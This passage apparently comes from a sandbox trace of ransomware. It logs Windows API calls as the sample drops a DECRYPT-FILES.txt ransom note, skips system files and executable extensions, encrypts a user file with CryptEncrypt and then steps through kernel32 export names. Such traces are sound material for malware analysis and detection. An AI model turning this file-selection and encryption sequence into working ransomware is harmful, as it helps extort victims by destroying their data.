17 [0078.078] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\DECRYPT-FILES.txt") returned 81 [0078.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.078] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.079] CloseHandle (hObject=0x44c) returned 1 [0078.080] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0078.080] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*" [0078.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaabc8c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaabc8c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.080] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.080] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaabc8c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaabc8c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.080] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.080] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.080] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc8c40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaabc8c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaabc8c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.080] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.080] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc8c40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaabc8c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaabc8c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.080] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.081] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.081] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.081] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.081] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.081] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.081] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0078.081] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.081] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0078.081] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\jkbimi8.tmp" [0078.081] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.081] CloseHandle (hObject=0x0) returned 0 [0078.081] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.081] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f6ce7b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f6ce7b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f6ce7b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x9382, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0078.081] lstrcmpiW (lpString1="MSO1033.acl", lpString2="DECRYPT-FILES.txt") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="autorun.inf") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="boot.ini") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="desktop.ini") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat") returned -1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="iconcache.db") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="bootsect.bak") returned 1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat.log") returned -1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="thumbs.db") returned -1 [0078.082] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Bootfont.bin") returned 1 [0078.082] lstrlenW (lpString="MSO1033.acl") returned 11 [0078.082] lstrcmpiW (lpString1="acl", lpString2="lnk") returned -1 [0078.082] lstrcmpiW (lpString1="acl", lpString2="exe") returned -1 [0078.082] lstrcmpiW (lpString1="acl", lpString2="sys") returned -1 [0078.082] lstrcmpiW (lpString1="acl", lpString2="dll") returned -1 [0078.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0078.082] lstrlenW (lpString="MSO1033.acl") returned 11 [0078.082] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0078.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="MSO1033.acl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" [0078.082] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.084] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=37762) returned 1 [0078.084] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.084] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.085] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.085] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.085] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.087] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.087] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.087] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.088] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.088] CloseHandle (hObject=0x454) returned 1 [0078.088] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.088] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.089] CloseHandle (hObject=0x0) returned 0 [0078.089] CloseHandle (hObject=0x450) returned 1 [0078.091] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.091] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.091] GetTickCount () returned 0x114c063 [0078.091] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.092] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.092] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.092] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.092] lstrlenA (lpString="kernel32.dll") returned 12 [0078.092] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.092] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.092] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.092] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.092] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.092] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.092] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.092] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.092] lstrlenA (lpString="ADDATOMA") returned 8 [0078.092] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.093] lstrlenA (lpString="ADDATOMW") returned 8 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.093] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.093] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.093] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.093] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.093] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.093] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.093] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.093] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.093] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.093] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.093] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.093] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.093] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.093] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.093] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.093] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.093] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.093] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.094] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.094] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.094] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.094] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.094] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.094] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.094] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.094] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.094] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.094] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.094] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.094] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.094] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.094] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.094] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.094] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.094] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.094] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.094] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.094] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.095] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.095] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.095] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.095] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.095] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.095] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.095] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.095] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.095] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.095] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.095] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.095] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.095] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.095] lstrlenA (lpString="BEEP") returned 4 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.095] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.095] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.095] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.095] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.095] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.095] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") 